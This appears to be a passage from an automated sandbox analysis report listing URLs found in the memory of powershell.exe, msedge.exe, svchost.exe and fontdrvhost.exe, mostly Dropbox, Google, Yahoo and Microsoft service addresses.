Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: msedge.exe, 00000013.00000002.1811051447.00000284298A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: msedge.exe, 00000006.00000002.1722230771.00000170B44A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comse
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: msedge.exe, 00000006.00000002.1725171267.000058400017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1820362608.00006A5C0017C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: msedge.exe, 00000006.00000002.1725171267.000058400017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1820362608.00006A5C0017C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: msedge.exe, 00000006.00000002.1724517878.000058400000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1819033524.00006A5C0002C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: fontdrvhost.exe, 0000001D.00000003.2402898237.00000000055FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: fontdrvhost.exe, 0000001D.00000003.2402898237.00000000055FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: svchost.exe, 00000007.00000003.1634603766.0000024B7CC81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000007.00000003.1634603766.0000024B7CC10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: msedge.exe, 00000013.00000002.1820719360.00006A5C00300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: msedge.exe, 00000013.00000002.1820719360.00006A5C00300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000006.00000002.1725555322.00005840003A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1820719360.00006A5C00300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: msedge.exe, 00000013.00000002.1820719360.00006A5C00300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/Y
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: msedge.exe, 00000013.00000002.1820719360.00006A5C00300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzenX
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.htmljj
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
